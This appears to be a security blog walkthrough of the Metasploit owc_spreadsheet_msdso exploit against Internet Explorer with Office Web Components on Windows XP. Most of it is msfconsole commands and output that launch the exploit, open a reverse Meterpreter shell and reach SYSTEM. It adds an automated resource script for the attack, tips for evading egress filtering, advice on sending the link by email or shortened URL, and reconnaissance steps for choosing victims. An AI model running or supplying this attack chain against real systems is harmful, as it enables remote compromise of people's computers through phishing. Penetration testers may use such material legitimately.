HD Moore has released his second IE 0-day Metasploit exploit module in the past two weeks. The Office Web Components exploit was committed to the 3.3-dev SVN tree and attacks the vulnerability on the following platform:
- Windows XP SP0 to SP3 with IE6 or IE7, with Office XP or Office 2003 installed
The exploit targets the msDataSourceObject method of the Office Web Components (OWC) Spreadsheet ActiveX control, which is where the module name owc_spreadsheet_msdso comes from. The code for the whole exploit can be seen on trac.metasploit.com.
To use the exploit we load it in msfconsole. For this example the console is run as root, since we want the exploit's web server to listen on port 80: a victim who can browse the web can almost certainly reach port 80, whereas the default 8080 may be blocked by filtering on the target network. Note that the Meterpreter payload still calls back to LPORT, which defaults to 4444; if egress filtering is a concern, change LPORT to something like 443 as well. We set the exploit, the payload and our address:

```
carlos@loki:~/svn/msf3-dev$ sudo ./msfconsole
[sudo] password for carlos:

       =[ msf v3.3-dev
+ -- --=[ 384 exploits - 261 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 166 aux

msf > use exploit/windows/browser/owc_spreadsheet_msdso
msf exploit(owc_spreadsheet_msdso) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(owc_spreadsheet_msdso) > set LHOST 192.168.1.158
LHOST => 192.168.1.158
```
Now we look at the other options available for this module and change the port the web server listens on to 80:

```
msf exploit(owc_spreadsheet_msdso) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Use SSL
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     192.168.1.158    yes       The local address
   LPORT     4444             yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0

msf exploit(owc_spreadsheet_msdso) > set SRVPORT 80
SRVPORT => 80
```

Now we launch the exploit and make sure no errors are reported:

```
msf exploit(owc_spreadsheet_msdso) > exploit
[*] Exploit running as background job.
msf exploit(owc_spreadsheet_msdso) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:80/4fwmCRO
[*] Local IP: http://192.168.1.158:80/4fwmCRO
[*] Server started.
```
We can now deliver the address to the target by email, by a tweet with a shortened URL, or by any other method. Once the exploit runs we must quickly migrate out of the IE process, since IE will hang or the user may kill it, destroying our shell:

```
[*] Sending Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption to 192.168.1.139:1067...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.139:1068)

msf exploit(owc_spreadsheet_msdso) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run migrate
[*] Migrating to lsass.exe...
[*] Current server process: iexplore.exe (1328)
[*] New server process: lsass.exe (684)
meterpreter > sysinfo
Computer: WINXPLAB01
OS      : Windows XP (Build 2600, Service Pack 2).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```

Migrating into lsass.exe and ending up as NT AUTHORITY\SYSTEM only works because the victim was browsing as a local Administrator on this XP box; from a limited user the migration into a SYSTEM-owned process is refused. Keep in mind as well that a crash in lsass.exe reboots the machine, so a less critical process is usually a safer destination.
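The whole procedure above (module, payload, port 80 web server, launch, immediate migration) can be scripted so it does not have to be typed in by hand each time. The following msfconsole resource script is an added example, not part of the original post or of HD Moore's module. It assumes a build that accepts `msfconsole -r` and honours the `AutoRunScript` datastore option, that port 443 is free on the attacking host for the callback, and the file name and URI path are made up for the example:

```text
# owc_spreadsheet.rc - added example, not from the original post or the Metasploit project.
# Load with: sudo ./msfconsole -r owc_spreadsheet.rc   (root so port 80 can be bound)
use exploit/windows/browser/owc_spreadsheet_msdso
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.158
# Web server on 80 (as in the post); callback on 443 so the reverse shell also
# looks like normal egress traffic. Assumption: 443 is not already in use on LHOST.
set SRVPORT 80
set LPORT 443
# Fixed URI instead of the random one so the link can be prepared (and shortened) ahead of time.
set URIPATH /report
# Assumption: this build honours AutoRunScript. migrate -f spawns a fresh process and
# moves Meterpreter into it as soon as the session opens, so the shell survives IE
# hanging or being closed by the user without touching a critical process like lsass.exe.
set AutoRunScript migrate -f
# -j keeps the exploit running as a background job so the console stays usable.
exploit -j
```

Once loaded, the console prints the same "Using URL" line as in the manual run, and each new session shows the migration output before the prompt is handed back.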
This exploit should be launched only after enumeration of the target network, preferably using document metadata gathered with tools like FOCA or Metagoofil to identify the Office and Windows versions in use, and with that information targeting the attack at the hosts that match the exploit's platform.
UPDATE: Removed the section where we covered how the code obfuscation worked, since HD updated the exploit and mentioned that it was having problems with the encoding. Changeset for the code